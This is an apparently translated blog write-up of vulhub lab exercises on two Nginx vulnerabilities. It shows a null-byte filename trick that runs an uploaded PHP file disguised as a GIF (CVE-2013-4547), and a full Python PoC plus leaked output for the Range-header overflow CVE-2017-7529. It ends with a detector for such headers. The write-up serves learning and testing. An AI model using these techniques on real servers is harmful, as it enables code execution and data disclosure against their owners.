
2025/8/21 23:29:15 Source: https://blog.csdn.net/ALe0721/article/details/147076069

Start the lab environment with vulhub.

Nginx filename logic vulnerability (CVE-2013-4547)

Upload 1.gif with the following content:

<?php phpinfo();?>

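Access the file at http://your-ip:8080/uploadfiles/1.gif[0x20][0x00].php; the 0x00 byte has to be set by editing the intercepted request.

First request /uploadfiles/1.gif a.php (the a is only a placeholder), then in

Here, change the a's byte 61 to 00, then forward the request.

Parsing succeeds.

Nginx out-of-bounds cache read vulnerability (CVE-2017-7529)

Start the environment with docker and run the PoC against it directly.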

import requests
import time
import urllib3


def cve20177529():
    try:
        # Build the request headers
        headers = {
            'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
        }
        url = input('请输入目标URL:')
        # Get the length of the normal response.
        # verify=False skips TLS certificate verification;
        # allow_redirects=False avoids false positives caused by redirects.
        r1 = requests.get(url, headers=headers, verify=False, allow_redirects=False)
        url_len = len(r1.content)
        # Make the requested length larger than the normal response length
        addnum = 200
        final_len = url_len + addnum
        # Build the Range header and add it to the headers
        # headers['Range'] = "bytes=-%d,-%d" % (final_len, 0x8000000000000000-final_len)
        headers = {
            'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36",
            'Range': "bytes=-%d,-%d" % (final_len, 0x8000000000000000 - final_len)
        }
        # Send the request with the new headers and output the result
        r2 = requests.get(url, headers=headers, verify=False, allow_redirects=False)
        text = r2.text
        code = r2.status_code
        if 'ETag' in text and code == 206:
            print('存在Nginx整数溢出漏洞(CVE-2017-7529),已输出到cve20177529_log.txt')
            # Write the result to a text file (the with block closes it)
            with open('cve20177529_log.txt', 'a', encoding="utf-8") as f:
                f.write('存在Nginx整数溢出漏洞(CVE-2017-7529)-------------' + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) + '-------------\n' + r2.text)
        else:
            print('未检测到漏洞')
            # Write the result to a text file (the with block closes it)
            with open('cve20177529_log.txt', 'a', encoding="utf-8") as f:
                f.write('未检测到漏洞-------------' + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) + '-------------\n' + r2.text)
    except Exception as result:
        print(result)


if __name__ == "__main__":
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    cve20177529()

Output written to cve20177529_log.txt:
存在Nginx整数溢出漏洞(CVE-2017-7529)-------------2025-04-08 19:26:35-------------
--00000000000000000002
Content-Type: text/html; charset=utf-8
Content-Range: bytes -200-611/612

, 08 Apr 2025 11:18:02 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 612
Last-Modified: Tue, 27 Jun 2017 13:40:50 GMT
Connection: close
ETag: "59526062-264"
Accept-Ranges: bytes

<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>body {width: 35em;margin: 0 auto;font-family: Tahoma, Verdana, Arial, sans-serif;}
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p><p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p><p><em>Thank you for using nginx.</em></p>
</body>
</html>
--00000000000000000002
Content-Type: text/html; charset=utf-8
Content-Range: bytes -9223372036854774384-611/612

Sensitive information is obtained.
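The two Content-Range values in the output above (-200 and -9223372036854774384) follow directly from the Range header the PoC sends. The following is an added example, not part of the original post and not nginx's source: a simplified model of an unclamped suffix-range computation, usable as a filter check on incoming Range headers. The function names and the signed 64-bit offset model are assumptions made for illustration.

```python
import re

INT64_MAX = 2**63 - 1  # upper bound of the signed 64-bit offsets modelled here


def to_int64(n):
    """Wrap an integer the way signed 64-bit arithmetic would."""
    return (n + 2**63) % 2**64 - 2**63


def suffix_ranges(header):
    """Return the suffix lengths from 'bytes=-N,-M'; other range forms are skipped."""
    if not header.startswith("bytes="):
        return []
    return [int(m) for m in re.findall(r"(?:^|,)\s*-(\d+)", header[len("bytes="):])]


def inspect_range(header, content_length):
    """Model an unclamped suffix-range computation and report what a filter should flag."""
    starts, total = [], 0
    for length in suffix_ranges(header):
        start = content_length - length   # negative when length > content_length
        starts.append(start)
        total += content_length - start   # number of bytes this range asks for
    wrapped = to_int64(total)
    negative = any(s < 0 for s in starts)
    return {
        "starts": starts,
        "negative_start": negative,
        "size_overflows": total > INT64_MAX,
        # a check of the form "wrapped total > content_length" would not reject this
        "passes_naive_size_check": wrapped <= content_length,
        "suspicious": negative or total > INT64_MAX,
    }


# Constructed input: the header shape the PoC above builds for a 612-byte page
SAMPLE = "bytes=-%d,-%d" % (612 + 200, 0x8000000000000000 - (612 + 200))

if __name__ == "__main__":
    print(inspect_range(SAMPLE, 612))        # flagged: negative starts, size overflow
    print(inspect_range("bytes=-100", 612))  # ordinary suffix range, not flagged
```

A suffix length larger than the resource, or a set of ranges whose combined size exceeds the signed 64-bit maximum, has no legitimate use, so a proxy or WAF rule can reject such headers outright.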
